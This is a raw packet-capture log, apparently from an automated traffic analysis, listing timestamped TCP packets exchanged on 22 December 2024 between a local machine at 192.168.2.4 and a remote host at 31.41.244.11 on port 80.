                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423161983 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423167944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423228979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423878908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423914909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423935890 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423949003 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423959970 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.423985004 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424004078 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424021006 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424029112 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424056053 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424062014 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424103975 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424704075 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424761057 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424767971 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424796104 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424809933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424832106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424848080 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424866915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424882889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424905062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424917936 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.424952984 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425538063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425591946 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425591946 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425643921 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425645113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425682068 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425697088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425715923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425734043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.425767899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426443100 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426477909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426500082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426512957 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426522970 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426549911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426561117 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426584005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426595926 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426620007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426629066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.426666021 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427361012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427397013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427413940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427432060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427448988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427467108 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427479029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.427516937 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428142071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428178072 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428196907 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428210020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428221941 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428245068 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428261042 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428281069 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428297043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428317070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428332090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.428366899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429044008 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429079056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429090023 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429114103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429121971 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429150105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429163933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429186106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429202080 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429224968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429857016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429912090 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429922104 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429958105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.429972887 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430005074 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430680037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430706978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430722952 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430725098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430756092 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430757046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430773973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430790901 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430794001 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430819988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.430845976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431574106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431593895 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431611061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431627035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431643963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431662083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431662083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431662083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431703091 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.431703091 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432432890 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432451963 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432467937 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432483912 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432493925 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432493925 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432501078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432516098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432518005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432537079 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432564020 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.432564020 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.433163881 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.433212996 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.523111105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.523204088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.523447990 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.523489952 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.523514032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.523540974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.524758101 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.524827957 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.524849892 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.524909019 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.525896072 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.525958061 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.526005030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.526057005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.527271032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.527348042 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.527389050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.527451992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.528642893 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.528709888 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.528728962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.528783083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.530008078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.530073881 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.530117035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.530169964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.531366110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.531434059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.531498909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.531554937 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.532727957 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.532788038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.532901049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.532947063 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.534116030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.534174919 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.534249067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.534306049 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.535449028 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.535516024 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.535554886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.535612106 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.536828995 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.536890984 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.536951065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.537004948 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.538182020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.538239956 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.538269997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.538325071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.539585114 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.539642096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.540210962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.540271997 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.540365934 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.540421009 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.541599035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.541660070 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.541726112 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.541788101 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.543715954 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.543787003 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.543876886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.543982983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.544332981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.544404030 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.544441938 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.544498920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.545723915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.545782089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.545826912 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.545891047 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.547055960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.547131062 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.547207117 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.547261953 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.552738905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.552813053 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.552855015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.552892923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.552906990 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.552949905 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.552993059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553039074 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553050041 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553087950 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553107977 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553123951 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553132057 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553181887 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553617001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.553668022 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.554183960 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.554238081 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.554356098 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.554404974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559372902 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559437037 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559448957 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559487104 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559499979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559525013 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559539080 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559562922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559578896 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559603930 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559617043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.559653044 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560226917 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560282946 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560296059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560333014 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560709000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560759068 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560836077 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.560887098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.562093973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.562144041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.562218904 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.562268019 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.563431025 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.563488960 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.563582897 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.563635111 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.564810991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.564866066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.564948082 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.564999104 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.566164970 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.566222906 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.566287041 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.566339970 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.567517042 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.567626953 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.567641020 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.567692995 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.568901062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.568954945 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.569020987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.569077015 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.570221901 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.570277929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586194038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586249113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586255074 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586297989 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586489916 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586529016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586543083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.586581945 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.587857962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:13.587910891 CET4976580192.168.2.431.41.244.11
